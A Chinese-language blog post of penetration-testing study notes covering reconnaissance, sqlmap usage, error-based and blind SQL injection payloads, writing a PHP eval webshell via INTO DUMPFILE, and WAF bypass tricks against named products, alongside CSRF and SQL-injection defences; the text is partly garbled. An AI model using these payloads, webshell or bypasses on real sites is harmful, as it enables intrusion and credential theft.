滲透測試實施

2021-09-25 18:32:46 字數 4192 閱讀 8317

1)資訊收集,

1,獲取網域名稱的whois資訊,獲取註冊者郵箱姓名**等。

2,查詢伺服器旁站以及子網域名稱站點,因為主站一般比較難,所以先看看旁站有沒有通用性的cms或者其他漏洞。

3,檢視伺服器作業系統版本,web中介軟體,看看是否存在已知的漏洞,比如iis,apache,nginx的解析漏洞

4,檢視ip,進行ip位址埠掃瞄,對響應的埠進行漏洞探測,比如 rsync,心臟出血,mysql,ftp,ssh弱口令等。

5,掃瞄**目錄結構,看看是否可以遍歷目錄,或者敏感檔案洩漏,比如php探針

6,google hack 進一步探測**的資訊,後台,敏感檔案

sqlmap,怎麼對乙個注入點注入?

1)如果是get型號,直接,sqlmap -u 「諸如點**」.

2) 如果是post型諸如點,可以sqlmap -u 「注入點**」 –data=」post的引數」

3)如果是cookie,x-forwarded-for等,可以訪問的時候,用burpsuite抓包,注入處用*號替換,放到檔案裡,然後sqlmap -r 「檔案位址」

nmap,掃瞄的幾種方式

sql注入的幾種型別?

1)報錯注入

2)bool型注入

3)延時注入

4)寬位元組注入

報錯注入的函式有哪些?

1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------

2)通過floor報錯 向下取整

3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10).exp()select * from test where id=1 and exp(~(select * from(select user())a));

延時注入如何來判斷?

if(ascii(substr(「hello」, 1, 1))=104, sleep(5), 1)

盲注和延時注入的共同點?

都是乙個字元乙個字元的判斷

如何拿乙個**的webshell?

上傳,後台編輯模板,sql注入寫檔案,命令執行,**執行,

一些已經爆出的cms漏洞,比如dedecms後台可以直接建立指令碼檔案,wordpress上傳外掛程式包含指令碼檔案zip壓縮包等

sql注入寫檔案都有哪些函式?

select 『一句話』 into outfile 『路徑』

select 『一句話』 into dumpfile 『路徑』

select 『<?php eval($_post[1]) ?>』 into dumpfile 『d:\wwwroot\

如何防止csrf?

1,驗證referer

2,驗證token

詳細:**cnode社群如何防止csrf攻擊 - cnode技術社群

owasp 漏洞都有哪些?

1、sql注入防護方法:

2、失效的身份認證和會話管理

3、跨站指令碼攻擊xss

4、直接引用不安全的物件

5、安全配置錯誤

6、敏感資訊洩露

7、缺少功能級的訪問控制

8、跨站請求偽造csrf

9、使用含有已知漏洞的元件

10、未驗證的重定向和**

sql注入防護方法?

1、使用安全的api

2、對輸入的特殊字元進行escape轉義處理

3、使用白名單來規範化輸入驗證方法

4、對客戶端輸入進行控制,不允許輸入sql注入相關的特殊字元

5、伺服器端在提交資料庫進行sql查詢之前,對特殊字元進行過濾、轉義、替換、刪除。

>

會以php方式來解析

**審計

eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

檔案讀取:file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

命令執行:system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

繞過walf

1、關鍵字可以用%(只限iis系列)。

比如select,可以sel%e%ct。原理:網路層waf對sel%e%ct進行url解碼後變成sel%e%ct,匹配select失敗,

而進入asp.dll對sel%e%ct進行url解碼卻變成select。iis下的asp.dll檔案在對asp檔案後引數串進行url解碼時,

會直接過濾掉09-0d(09是tab鍵,0d是回車)、20(空格)、%(後兩個字元有乙個不是十六進製制)字元。xss也是同理。

2、通殺的,內聯注釋。安全狗不攔截,但是安全寶、加速樂、d盾等,看到/!/就fack了,所以只限於安全狗。比如:/!select*/

4,繞過策略一:偽造搜尋引擎

早些版本的安全狗是有這個漏洞的,就是把user-agent修改為搜尋引擎

5,360webscan指令碼存在這個問題,就是判斷是否為admin dede install等目錄,如果是則不做攔截

get /pen/news.php?id=1 union select user,password from mysql.user

get /pen/news.php/admin?id=1 union select user,password from mysql.user

get /pen/admin/..\news.php?id=1 union select user,password from mysql.user

6,multipart請求繞過,在post請求中新增乙個上傳檔案,繞過了絕大多數waf。

7,引數繞過,複製引數,id=1&id=1

用一些特殊字元代替空格,比如在mysql中%0a是換行,可以代替空格,這個方法也可以部分繞過最新版本的安全狗,在sqlserver中可以用/**/代替空格

8,內聯注釋,

檔案上傳,複製檔案包乙份再加乙份

在 form-data;後面增加一定的字元

寬字元注入

寬字元:

解 決方法:

就是在初始化連線和字符集之後,使用set character_set_client=binary來設定客戶端的字符集是二進位制的。

修改windows下的mysql配置檔案一般是 my.ini,

linux下的mysql配置檔案一般是my.cnf,

比如:mysql_query(「setcharacter_set_client=binary」);。

character_set_client指定的是sql語句的編碼,如果設定為 binary,mysql就以二進位制來執行,這樣寬位元組編碼問題就沒有用武之地了。

滲透測試學習筆記 初識滲透測試

黑客活動 hacking 道德黑客 ethical hacking 白帽黑客 white hat hacking poc proof of concept,概念證明。pt penetration testing或者pen testing,滲透測試。apt advanced package tool,...

滲透測試 SSH

安全shell ssh 服務提供了對unix和windows系統的加密訪問,通過ssh可以進行命令列shell訪問 檔案訪問與安全ftp 以及簡單的vpn服務。由於使用明文的服務 如telnet 存在的弱點經常會被攻擊者利用來突破網路,所以ssh應運而生,主要用於實現對伺服器的加密訪問,以達到安全地...

滲透測試 Wget

第一次接觸到wget這個指令是在 網路安全評估 一書中的第179頁 wget r m nv 常用引數 m,mirror 等價於 r n l inf nr.nv,non verbose 關掉冗長模式,但不是安靜模式 a,accept list 可以接受的檔案型別 r,reject list 拒絕接受的...